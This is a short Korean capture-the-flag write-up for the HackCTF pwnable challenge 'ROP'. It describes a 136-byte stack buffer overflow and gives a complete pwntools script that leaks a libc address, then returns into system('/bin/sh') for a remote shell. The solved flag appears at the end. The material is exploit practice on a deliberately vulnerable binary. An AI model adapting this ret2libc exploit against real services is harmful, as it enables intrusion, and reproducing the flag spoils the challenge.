[HackCTF : Pwnable] ROP (300p)

[HackCTF : Pwnable] ROP (300p)

ROP

checksec

rop

입력을 받고 종료한다.

 

main

대놓고 취약한 함수가 있다.

 

vulnerable_function

136byte buf에 256byte 입력을 받아 bof가 터짐

이전에 풀었던 Yes or no 문제랑 똑같이 풀었다.

 

from pwn import *
 
p = remote("ctf.j0n9hyun.xyz",3021)
e = ELF("./rop")
libc = ELF("./libc.so.6")
 
pppr = 0x08048509
write_plt = e.plt["write"]
read_got = e.got["read"]
read_offset = libc.symbols["read"]
system_offset = libc.symbols["system"]
binsh_off = libc.search("/bin/sh").next()
 
#payload1
payload = "A"*140 + p32(write_plt) + p32(pppr) + p32(1) + p32(read_got) + p32(4) + p32(0x804844b)
p.sendline(payload)
read_addr = u32(p.recv(4))
log.success(hex(read_addr))
 
libc_base = read_addr - read_offset
system_addr = libc_base + system_offset
binsh_addr = libc_base + binsh_off
 
#payload2
payload = "A"*140 + p32(system_addr) + "AAAA" + p32(binsh_addr)
p.sendline(payload)
p.interactive()

payload1에서 메모리 leak하고 payload2에서 rtl로 쉘을 실행시켰다.

 

exploit

HackCTF{4bcd3fg7ijPlmA4pqrtuvxza2cdef}